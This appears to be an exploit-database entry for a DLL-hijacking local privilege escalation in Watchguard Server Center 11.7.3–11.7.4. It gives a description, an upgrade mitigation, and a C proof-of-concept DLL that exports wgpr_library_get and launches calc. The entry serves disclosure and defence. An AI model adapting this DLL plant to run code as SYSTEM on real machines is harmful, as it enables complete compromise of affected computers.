header-logo
Suggest Exploit
vendor:
Server Center
by:
SecurityFocus
7,2
CVSS
HIGH
Local Privilege Escalation
264
CWE
Product Name: Server Center
Affected Version From: 11.7.4
Affected Version To: 11.7.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2013

Watchguard Server Center Local Privilege Escalation Vulnerability

Watchguard Server Center is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers. An attacker can exploit this vulnerability by using a malicious DLL to execute arbitrary code with SYSTEM privileges.

Mitigation:

Upgrade to the latest version of Watchguard Server Center.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/62261/info

Watchguard Server Center is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to gain SYSTEM privileges. Successful exploits will result in the complete compromise of affected computers.

Watchguard Server Center 11.7.4 and 11.7.3 are vulnerable; other versions may also be affected. 

#include <windows.h>

#define DLL_EXPORT __declspec(dllexport)

#ifdef __cplusplus
extern "C"
{
#endif

void DLL_EXPORT wgpr_library_get()
{
    WinExec("calc",0);
}

#ifdef __cplusplus
}
#endif

Navigation

Suggest Exploit

Services By CQR